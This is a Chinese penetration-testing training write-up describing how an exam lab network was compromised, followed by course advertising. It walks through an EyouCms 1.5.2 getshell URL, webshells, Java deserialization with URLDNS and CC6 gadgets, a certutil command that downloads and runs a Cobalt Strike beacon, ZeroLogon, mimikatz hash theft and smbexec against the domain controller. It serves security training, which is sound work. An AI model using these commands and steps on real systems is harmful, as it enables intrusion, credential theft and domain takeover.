暗月渗透测试十月份考核文章第四篇
2022-10-17 12:42:18 Author: moonsec(查看原文) 阅读量:27 收藏

暗月渗透测试十月份考核文章第四篇

0考核介绍

本次考核最终通过人数七人 达到预期目标

考核内容 

本次考核使用在线靶靶场,主要考核从外网打点到内网域渗透的能力。

  • web:php代码审计 、java反序列化漏洞利用等。

  • 内网:隧道应用、横向渗透、域渗透等 。

难度 中

拓扑图:


10x01 渗透过程

访问站点,发现是EyouCms

通过百度搜索,发现eyoucms1.5.2版本存在前台getshell

参考文章如下

https://www.cnblogs.com/1jzz/p/15489724.html
https://www.yisu.com/zixun/497673.html

利用脚本获取PHPSESSID(来自https://www.yisu.com/zixun/497673.html)

替换cookie进入后台

远程下载插件(也是取巧来自https://www.yisu.com/zixun/497673.html)

http://216.224.123.190/login.php?m=admin&c=weapp&a=downloadInstall&url=https://www.eyoucms.com/uploads/allimg/210420/1618908445631562.jpg

访问webshell

http://216.224.123.190/uploads/allimg/news_2021.php

连接蚁剑

上传哥斯拉的马,方便下一步上传大文件

通过哥斯拉执行上传的exe上线,从桌面翻到qqClient.jar,账号.txt。并从账号.txt获取到2个账号。

通过反编译jar包,发现下一个靶机信息

通过在github上搜索qqClient.jar,发现一个与源码极为相似的项目,而且同时存在server端的代码

通过审计服务端发现两处反序列化点

第一处qqserver.java

第二处ServerConnectClientThread.java

因为有过提示User类不是漏洞点,那就只有Message类了,去客户端寻找那些地方使用了wireObject(message)方法

随便在上面四个找了一个点,sendMessageToAll

就是在向所有人发送消息时,会触发序列化。首先利用URLDNS链来探测。

服务端取一个debug断点

客户端启动,,账户密码是被后端写死的

输入账号密码后选择向全部人发送消息触发客户端序列化

访问dnslog成功

URLDNS之后应该就是CC链了,给客户端与服务端同时添加commons-collections-3.2.1.jar作为依赖包。并生成CC链恶意对象,步骤与测试URLDNS相同。

选取CC6Gaget作为恶意对象

cc6参考文章:

https://www.yuque.com/yang99/take9g/fqaw5x

几乎可以完全复制

只需修改calc命令为你要执行的命令就行

然后根据第一台靶机QQclient.jar的反编译信息新建一个项目并添加commons-collections-3.2.1.jar作为依赖包,在sendMessageToAll中添加cc6恶意对象。

powershell上线并未成功,不过利用nc工具,确定了利用方式是正确的

利用已有的外网中转上线,创建listener

生成beacon123.exe,并放在第一台服务的web根目录下

通过远程下载(替换calc),分别执行以下命令。

certutil -urlcache -split -f http://192.168.22.152/beacon123.exe  beacon123.exe
beacon123.exe

上线第一台不出网机器

后面就是域控了,首先确定域控的名字,就是AD

在第二台机器上mimikatz并没有抓到域控或者域用户的密码,

尝试CVE-2020-1472-ZeroLogon漏洞

mimikatz进行测试,发现存在漏洞

利用mimikatz读取administratorhash

利用第二台机器开启socks代理并结合Proxifier

smbexec.exe获取adshell

最后是ad上线cs

第一步:ad开启共享netshare

第二步:第二台机器作为中转机器生成ad.exe,并通过第二台机器ipc连接域控并上传exe

第三步:通过smbexec.exe获取的adshell执行ad.exe

至此,所有机器都上线cs

2关注公众号

公众号长期更新安全类文章,关注公众号,以便下次轻松查阅

觉得文章对你有帮助 请转发 点赞 收藏

3关于培训

需要渗透测试培训

扫一扫添加微信咨询

课程内容点击了解

暗月渗透测试课程更新


文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMjc0NTEzMw==&mid=2653583904&idx=1&sn=c5e1b55d3079e8381450d45b258c9704&chksm=811b6c62b66ce5749956ec1f57299cdcdda8638c38b4a62dfd1daf2ea96c53715ea0503561ad#rd
如有侵权请联系:admin#unsafe.sh